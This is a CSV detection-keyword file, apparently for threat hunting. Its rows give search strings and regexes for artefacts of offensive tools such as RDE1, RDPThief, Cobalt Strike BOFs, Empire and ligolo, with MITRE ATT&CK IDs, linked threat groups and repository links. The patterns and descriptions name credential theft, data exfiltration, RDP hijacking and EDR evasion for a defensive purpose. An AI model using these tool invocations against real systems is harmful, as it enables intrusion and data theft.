"* rde1 srde_windows*",".{0,1000}\srde1\ssrde_windows.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","2785"
"* rdp * -u * -p * --nla-screenshot*",".{0,1000}\srdp\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-nla\-screenshot.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2786"
"*- RDP Session Hijack*",".{0,1000}\-\sRDP\sSession\sHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","2787"
"* rdp-enum-encryption.nse*",".{0,1000}\srdp\-enum\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2788"
"* RDPHook.dll*",".{0,1000}\sRDPHook\.dll.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","2789"
"* rdp-ntlm-info.nse*",".{0,1000}\srdp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2790"
"* RdpThief.dll*",".{0,1000}\sRdpThief\.dll.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","0","N/A","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","2791"
"* rdpv.exe*",".{0,1000}\srdpv\.exe.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","2792"
"* rdp-vuln-ms12-020.nse*",".{0,1000}\srdp\-vuln\-ms12\-020\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2793"
"* --read *\\* --tcp-connect 127.0.0.1:* --write *",".{0,1000}\s\-\-read\s.{0,1000}\\\\.{0,1000}\s\-\-tcp\-connect\s127\.0\.0\.1\:.{0,1000}\s\-\-write\s.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","N/A","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","2796"
"* ReadFromLsass*",".{0,1000}\sReadFromLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","2797"
"* ReadPEInMemory.exe*",".{0,1000}\sReadPEInMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","2798"
"* -RealCmdLine *",".{0,1000}\s\-RealCmdLine\s.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","2799"
"* -RealCmdLine *",".{0,1000}\s\-RealCmdLine\s.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","2800"
"* realvnc-auth-bypass.nse*",".{0,1000}\srealvnc\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2801"
"* rec2 crde_linux*",".{0,1000}\srec2\scrde_linux.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","2802"
"* rec2 crde_macos*",".{0,1000}\srec2\scrde_macos.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","2803"
"* Recall folder found: *",".{0,1000}\sRecall\sfolder\sfound\:\s.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","2804"
"* received ACK from backdoor*",".{0,1000}\sreceived\sACK\sfrom\sbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","2805"
"* -Recommended -SprayEmptyPasswords*",".{0,1000}\s\-Recommended\s\-SprayEmptyPasswords.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","2806"
"*----------------- Recon & Enumeration Modules -----------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sRecon\s\&\sEnumeration\sModules\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","2807"
"* reconFTW installer/updater script *",".{0,1000}\sreconFTW\sinstaller\/updater\sscript\s.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","2808"
"* reconftw.sh *",".{0,1000}\sreconftw\.sh\s.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","2809"
"* RedBackdoorer.py*",".{0,1000}\sRedBackdoorer\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2810"
"* Redirect Url After Stealing ==> *",".{0,1000}\sRedirect\sUrl\sAfter\sStealing\s\=\=\>\s.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","2811"
"* redirecttosmb.py*",".{0,1000}\sredirecttosmb\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","2812"
"* redis-brute.nse*",".{0,1000}\sredis\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2813"
"* redis-info.nse*",".{0,1000}\sredis\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2814"
"* redpill.ps1*",".{0,1000}\sredpill\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2815"
"* redsocks.sh*",".{0,1000}\sredsocks\.sh.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","2816"
"* --reflective-injection *",".{0,1000}\s\-\-reflective\-injection\s.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","2817"
"* reg_hive_sam.py*",".{0,1000}\sreg_hive_sam\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2818"
"* reg_hive_security.py*",".{0,1000}\sreg_hive_security\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2819"
"* reg_hive_system.py*",".{0,1000}\sreg_hive_system\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2820"
"* reg_recover-rs.exe*",".{0,1000}\sreg_recover\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2821"
"* RegisterEventSourceW(L""DESKTOP-...""* L""1337*",".{0,1000}\sRegisterEventSourceW\(L\""DESKTOP\-\.\.\.\"".{0,1000}\sL\""1337.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","0","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","2822"
"* -Registry -AtStartup *",".{0,1000}\s\-Registry\s\-AtStartup\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2823"
"* -relayserver *:5555*",".{0,1000}\s\-relayserver\s.{0,1000}\:5555.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","2824"
"* -remote -bindPipe * -bindPort * -security*",".{0,1000}\s\-remote\s\-bindPipe\s.{0,1000}\s\s\-bindPort\s.{0,1000}\s\-security.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","2828"
"* -Remote -ExchHostname *",".{0,1000}\s\-Remote\s\-ExchHostname\s.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","2829"
"* --remote gsocket*",".{0,1000}\s\-\-remote\sgsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","2830"
"* -Remote_Posh -Location *.ps1 -Function Invoke-* -ComputerName *",".{0,1000}\s\-Remote_Posh\s\-Location\s.{0,1000}\.ps1\s\-Function\sInvoke\-.{0,1000}\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","N/A","10","813","146","2024-06-25T12:02:26Z","2016-05-24T14:00:14Z","2831"
"* RemoteAccessPolicyEnumeration.ps1*",".{0,1000}\sRemoteAccessPolicyEnumeration\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","2832"
"* -RemoteDllHandle *",".{0,1000}\s\-RemoteDllHandle\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2834"
"* -remotefilepath *\\*.wav*",".{0,1000}\s\-remotefilepath\s.{0,1000}\\\\.{0,1000}\.wav.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","N/A","4","344","63","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z","2835"
"* RemoteHashRetrieval.ps1*",".{0,1000}\sRemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","2836"
"* --remote-impersonation*",".{0,1000}\s\-\-remote\-impersonation.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","2837"
